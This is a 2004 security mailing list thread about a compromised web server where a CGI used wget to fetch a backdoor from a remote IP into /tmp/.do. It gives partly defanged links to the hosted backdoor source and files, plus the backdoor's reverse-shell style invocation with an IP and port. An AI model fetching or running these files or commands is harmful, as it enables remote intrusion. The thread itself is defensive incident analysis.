[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [suse-security] Re: Backdoor over http(s)??



It looks like the source was left on the server (along with other things):

httpREMOVE://218.234.171.84/manual/.x/rs.c

Only follow the link if you know what you are doing (and remove the REMOVE
text)

The rest of the files:

httpREMOVE://218.234.171.84/manual/.x/

> -----Original Message-----
> From: jaska [mailto:jaska@xxxxxxxxx]
> Sent: Tuesday 13 January 2004 03:16 PM
> To: suse-security@xxxxxxxx
> Subject: Re: [suse-security] Re: Backdoor over http(s)??
> 
> 
> Hi 
> 
> I found that server too, and some other "a-bit-worrying" stuff...
> 
> For some reason my e-mail never reached this list.. wonder 
> what happens this 
> time.
> 
> Jask.a
> 
> 
> > Some CGI at your webserver did run wget to receive some file from
> > 218.234.171.84 and save it on your disc as "/tmp/.do".
> > wwwrun:nogroup are standard user and group used for apache.
> >
> > The file is still avaiable from http://218.234.171.84/manual/.x/rhs
> > I don't want to execute it, but strings does list some information:
> >
> > usage: %s <IP or hostname> <port>
> >
> > (/tmp/.do 163.17.51.8 9090)
> >
> 
> 
> -- 
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
> 


Siemens Traffic Controls is a division of Siemens plc. Registered No.
727817, England. 
Registered office: Siemens House, Oldbury, Bracknell, Berkshire, RG12 8FZ. 

This communication contains information which is confidential and 
may also be privileged. It is for the exclusive use of the addressee. 
If you are not the addressee please note that any distribution, 
reproduction, copying, publication or use of this communication 
or the information in it is prohibited.  If you have received this 
communication in error, please contact us immediately and also 
delete the communication from your computer. 



-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here